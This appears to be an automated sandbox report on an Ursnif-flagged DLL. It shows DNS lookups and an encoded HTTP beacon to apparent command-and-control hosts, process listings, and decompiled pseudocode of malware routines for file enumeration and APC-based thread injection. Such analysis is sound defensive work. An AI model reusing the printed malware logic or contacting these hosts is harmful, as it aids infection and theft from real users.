Jan 12, 2021 18:11:03.677486897 CET	56338	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:03.751777887 CET	53	56338	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:04.371150970 CET	59420	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:04.430051088 CET	53	59420	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:25.976330996 CET	58784	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:26.035058022 CET	53	58784	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:27.121786118 CET	63978	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:27.178491116 CET	53	63978	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:27.196666956 CET	62938	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:27.311280966 CET	53	62938	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:27.316843033 CET	55708	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:27.373126030 CET	53	55708	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:49.644403934 CET	56803	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:49.702145100 CET	53	56803	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:50.897178888 CET	57145	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:51.312241077 CET	53	57145	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:10.396784067 CET	55359	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:10.456108093 CET	53	55359	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:10.931917906 CET	58306	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:10.988442898 CET	53	58306	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:11.538985014 CET	64124	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:11.595397949 CET	53	64124	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:11.980071068 CET	49361	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:12.036189079 CET	53	49361	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:12.442333937 CET	63150	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:12.503580093 CET	53	63150	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:12.751403093 CET	53279	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:12.955703020 CET	56881	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:13.012136936 CET	53	56881	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:13.178747892 CET	53	53279	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:13.470160007 CET	53642	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:13.518147945 CET	53	53642	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:14.130614996 CET	55667	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:14.189860106 CET	53	55667	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:14.830266953 CET	54833	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:14.886481047 CET	53	54833	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:15.285181999 CET	62476	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:15.341681957 CET	53	62476	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 12, 2021 18:10:49.856673002 CET	192.168.2.3	8.8.8.8	0x7022	Standard query (0)	babidone.top	A (IP address)	IN (0x0001)
Jan 12, 2021 18:11:04.371150970 CET	192.168.2.3	8.8.8.8	0x921d	Standard query (0)	babidone.top	A (IP address)	IN (0x0001)
Jan 12, 2021 18:11:50.897178888 CET	192.168.2.3	8.8.8.8	0xce42	Standard query (0)	begoventa.top	A (IP address)	IN (0x0001)
Jan 12, 2021 18:12:12.751403093 CET	192.168.2.3	8.8.8.8	0x4b5d	Standard query (0)	babidone.top	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 12, 2021 18:10:50.276988029 CET	8.8.8.8	192.168.2.3	0x7022	No error (0)	babidone.top		193.56.255.166	A (IP address)	IN (0x0001)
Jan 12, 2021 18:11:04.430051088 CET	8.8.8.8	192.168.2.3	0x921d	Server failure (2)	babidone.top	none	none	A (IP address)	IN (0x0001)
Jan 12, 2021 18:11:51.312241077 CET	8.8.8.8	192.168.2.3	0xce42	No error (0)	begoventa.top		47.91.89.242	A (IP address)	IN (0x0001)
Jan 12, 2021 18:12:13.178747892 CET	8.8.8.8	192.168.2.3	0x4b5d	No error (0)	babidone.top		193.56.255.166	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

begoventa.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49746	47.91.89.242	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2021 18:11:51.384207964 CET	4237	OUT	GET /images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: begoventa.top Connection: Keep-Alive
Jan 12, 2021 18:11:51.427160025 CET	4238	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49747	47.91.89.242	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2021 18:11:51.820136070 CET	4238	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: begoventa.top Connection: Keep-Alive
Jan 12, 2021 18:11:51.863253117 CET	4238	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6132 Parent PID: 5668

General

Start time:	18:09:26
Start date:	12/01/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll'
Imagebase:	0x1230000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 6388 Parent PID: 792

General

Start time:	18:10:04
Start date:	12/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7f5860000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6496 Parent PID: 6388

General

Start time:	18:10:04
Start date:	12/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
Imagebase:	0x300000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1140 Parent PID: 792

General

Start time:	18:10:47
Start date:	12/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7488e0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4144 Parent PID: 1140

General

Start time:	18:10:48
Start date:	12/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
Imagebase:	0x300000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3288 Parent PID: 792

General

Start time:	18:11:25
Start date:	12/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7f5860000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6620 Parent PID: 3288

General

Start time:	18:11:25
Start date:	12/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
Imagebase:	0x300000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3984 Parent PID: 792

General

Start time:	18:11:48
Start date:	12/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7f5860000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6772 Parent PID: 3984

General

Start time:	18:11:49
Start date:	12/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2
Imagebase:	0x300000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6132 Parent PID: 5668 loaddll32.exeCOMMON

Executed Functions

Function 00CF523C, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CF523C(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xcfd2a0; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xcfd238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xcfd2a0; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xcfd238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xcfd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xcfd2a0; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xcfd2a4; // 0x247a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xcfe7f2; // 0x73797325
				_t83 = E00CF27B6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xcfd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xcfd2a4; // 0x247a5a8
				_t16 = _t93 + 0xcfe813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00cf5245
0x00cf524b
0x00cf524d
0x00cf5267
0x00cf5269
0x00cf526e
0x00cf54e3
0x00cf54ea
0x00cf54ea
0x00cf5274
0x00cf5289
0x00cf528b
0x00cf528d
0x00cf5292
0x00cf54d3
0x00cf54dd
0x00000000
0x00cf54dd
0x00cf5298
0x00cf52a3
0x00cf52a8
0x00cf52ad
0x00cf52b0
0x00cf52b7
0x00cf52bc
0x00cf52c1
0x00cf54c3
0x00cf54cd
0x00000000
0x00cf54cd
0x00cf52d7
0x00cf52db
0x00cf52de
0x00cf52e1
0x00cf52e7
0x00cf52ec
0x00cf52f5
0x00cf52fb
0x00cf5305
0x00cf530c
0x00cf530c
0x00cf531e
0x00cf5329
0x00cf5337
0x00cf533c
0x00cf5341
0x00cf5344
0x00cf5349
0x00cf5353
0x00cf5356
0x00cf5359
0x00cf536f
0x00cf5371
0x00cf5376
0x00cf54c1
0x00000000
0x00cf54c1
0x00cf538d
0x00cf53de
0x00cf53a1
0x00cf53a9
0x00cf53ae
0x00cf53bc
0x00cf53c5
0x00cf53ce
0x00cf53ce
0x00cf53dc
0x00cf53dc
0x00cf53e2
0x00cf53e6
0x00cf53e6
0x00cf53ec
0x00000000
0x00000000
0x00cf53ee
0x00cf53f4
0x00cf549b
0x00cf549e
0x00cf54ab
0x00cf54ab
0x00cf54af
0x00000000
0x00000000
0x00cf54a4
0x00cf54a8
0x00cf54a8
0x00cf54aa
0x00cf54aa
0x00cf54b4
0x00cf54bb
0x00cf54bd
0x00000000
0x00cf54bd
0x00cf53fa
0x00cf53fc
0x00cf53fc
0x00cf540f
0x00cf5415
0x00cf5420
0x00cf5422
0x00cf5426
0x00cf5428
0x00cf5428
0x00cf542d
0x00cf542f
0x00cf542f
0x00cf542d
0x00cf5434
0x00cf5438
0x00cf5438
0x00cf5448
0x00cf544d
0x00cf5450
0x00cf5450
0x00cf5453
0x00cf545d
0x00cf5465
0x00cf546a
0x00cf5478
0x00cf5478
0x00cf548c
0x00cf5490
0x00cf5490

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00CF5267
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00CF5289
memset.NTDLL ref: 00CF52A3

Part of subcall function 00CF27B6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00CF5073,63699BCE,00CF52BC,73797325), ref: 00CF27C7
Part of subcall function 00CF27B6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00CF27E1

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00CF52E1
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00CF52F5
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CF530C
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00CF5318
lstrcat.KERNEL32(?,642E2A5C), ref: 00CF5359
FindFirstFileA.KERNELBASE(?,?), ref: 00CF536F
CompareFileTime.KERNEL32(?,?), ref: 00CF538D
FindNextFileA.KERNELBASE(00CF568F,?), ref: 00CF53A1
FindClose.KERNEL32(00CF568F), ref: 00CF53AE
FindFirstFileA.KERNEL32(?,?), ref: 00CF53BA
CompareFileTime.KERNEL32(?,?), ref: 00CF53DC
StrChrA.SHLWAPI(?,0000002E), ref: 00CF540F
memcpy.NTDLL(00000000,?,00000000), ref: 00CF5448
FindNextFileA.KERNELBASE(00CF568F,?), ref: 00CF545D
FindClose.KERNEL32(00CF568F), ref: 00CF546A
FindFirstFileA.KERNEL32(?,?), ref: 00CF5476
CompareFileTime.KERNEL32(?,?), ref: 00CF5486
FindClose.KERNELBASE(00CF568F), ref: 00CF54BB
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00CF54CD
HeapFree.KERNEL32(00000000,?), ref: 00CF54DD

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: 5d60285afdaf957d876f5c921657b575027a6cdb1f9cc937f6ee9557bfacd089
Instruction ID: f68830781c399b77f7a2df39d3dcde8afc6a8538959ad51977e38682ce8bb5da
Opcode Fuzzy Hash: 5d60285afdaf957d876f5c921657b575027a6cdb1f9cc937f6ee9557bfacd089
Instruction Fuzzy Hash: 3A81477190021DAFDB109FA5DC84BFEBBB9EB44301F10406AE715E6260E7719A85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 100019C7, Relevance: 24.1, APIs: 16, Instructions: 120
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E100019C7(void* __edi, long _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				void* _v48;
				long _t25;
				int _t27;
				long _t30;
				long _t31;
				void* _t32;
				long _t35;
				long _t36;
				long _t40;
				void* _t45;
				intOrPtr _t48;
				signed int _t53;
				void* _t58;
				signed int _t61;
				void* _t64;
				intOrPtr* _t65;

				_t25 = E10001799();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					GetSystemTime( &_v24);
					_t27 = SwitchToThread();
					asm("cdq");
					_t53 = 9;
					_t61 = _t27 + (_v24.wMilliseconds & 0x0000ffff) % _t53;
					_t30 = E1000167E(__edi, _t61); // executed
					_v8 = _t30;
					Sleep(_t61 << 5); // executed
					_t31 = _v8;
				} while (_t31 == 0xc);
				if(_t31 != 0) {
					L21:
					return _t31;
				}
				_push(__edi);
				if(_a4 != 0) {
					L11:
					_t32 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, 0); // executed
					_t64 = _t32;
					if(_t64 == 0) {
						L18:
						_v8 = GetLastError();
						L19:
						_t31 = _v8;
						if(_t31 == 0xffffffff) {
							_t31 = GetLastError();
						}
						goto L21;
					}
					_t35 = QueueUserAPC(E1000133E, _t64,  &_v48); // executed
					if(_t35 == 0) {
						_t40 = GetLastError();
						_a4 = _t40;
						TerminateThread(_t64, _t40);
						CloseHandle(_t64);
						_t64 = 0;
						SetLastError(_a4);
					}
					if(_t64 == 0) {
						goto L18;
					} else {
						_t36 = WaitForSingleObject(_t64, 0xffffffff);
						_v8 = _t36;
						if(_t36 == 0) {
							GetExitCodeThread(_t64,  &_v8);
						}
						CloseHandle(_t64);
						goto L19;
					}
				}
				if(E10001C6E(_t53,  &_a4) != 0) {
					 *0x10004138 = 0;
					goto L11;
				}
				_t65 = __imp__GetLongPathNameW;
				_t45 =  *_t65(_a4, 0, 0); // executed
				_t58 = _t45;
				if(_t58 == 0) {
					L9:
					 *0x10004138 = _a4;
					goto L11;
				}
				_t14 = _t58 + 2; // 0x2
				_t48 = E10001669(_t58 + _t14);
				 *0x10004138 = _t48;
				if(_t48 == 0) {
					goto L9;
				}
				 *_t65(_a4, _t48, _t58); // executed
				E10001E78(_a4);
				goto L11;
			}

0x100019ce
0x100019d5
0x100019da
0x10001b0a
0x10001b0a
0x100019e1
0x100019e5
0x100019eb
0x100019f9
0x100019fa
0x100019fd
0x10001a00
0x10001a09
0x10001a0c
0x10001a12
0x10001a15
0x10001a1c
0x10001b07
0x00000000
0x10001b07
0x10001a22
0x10001a26
0x10001a7c
0x10001a8c
0x10001a92
0x10001a9c
0x10001af7
0x10001af9
0x10001afc
0x10001afc
0x10001b03
0x10001b05
0x10001b05
0x00000000
0x10001b03
0x10001aa8
0x10001ab6
0x10001ab8
0x10001abc
0x10001abf
0x10001ac6
0x10001acb
0x10001acd
0x10001acd
0x10001ad5
0x00000000
0x10001ad7
0x10001ada
0x10001ae0
0x10001ae5
0x10001aec
0x10001aec
0x10001af3
0x00000000
0x10001af3
0x10001ad5
0x10001a33
0x10001a76
0x00000000
0x10001a76
0x10001a35
0x10001a40
0x10001a42
0x10001a46
0x10001a6c
0x10001a6f
0x00000000
0x10001a6f
0x10001a48
0x10001a4d
0x10001a52
0x10001a59
0x00000000
0x00000000
0x10001a60
0x10001a65
0x00000000

APIs

Part of subcall function 10001799: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,100019D3), ref: 100017A8
Part of subcall function 10001799: GetVersion.KERNEL32(?,100019D3), ref: 100017B7
Part of subcall function 10001799: GetCurrentProcessId.KERNEL32(?,100019D3), ref: 100017D3
Part of subcall function 10001799: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,100019D3), ref: 100017EC

GetSystemTime.KERNEL32(?), ref: 100019E5
SwitchToThread.KERNEL32 ref: 100019EB

Part of subcall function 1000167E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,10001A05,?,00000000,?,?,?,?,?,?,?,10001A05), ref: 100016D4
Part of subcall function 1000167E: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,10001A05,00000000), ref: 10001766
Part of subcall function 1000167E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,10001A05), ref: 10001781

Sleep.KERNELBASE(00000000,00000000), ref: 10001A0C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001A40
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001A60
CreateThread.KERNEL32 ref: 10001A8C
QueueUserAPC.KERNELBASE(1000133E,00000000,?), ref: 10001AA8
GetLastError.KERNEL32 ref: 10001AB8
TerminateThread.KERNEL32(00000000,00000000), ref: 10001ABF
CloseHandle.KERNEL32(00000000), ref: 10001AC6
SetLastError.KERNEL32(?), ref: 10001ACD
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10001ADA
GetExitCodeThread.KERNEL32(00000000,?), ref: 10001AEC
CloseHandle.KERNEL32(00000000), ref: 10001AF3
GetLastError.KERNEL32 ref: 10001AF7
GetLastError.KERNEL32 ref: 10001B05

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
String ID:
API String ID: 2478182988-0
Opcode ID: fa1ee72ffcd87df28d4980db385e47b2fea2ca39d0f496df63b7363508c87dfc
Instruction ID: 4aef50b4a7eb8dd860cd90a223b160882761c3e146f8e067f7313366ed264c2c
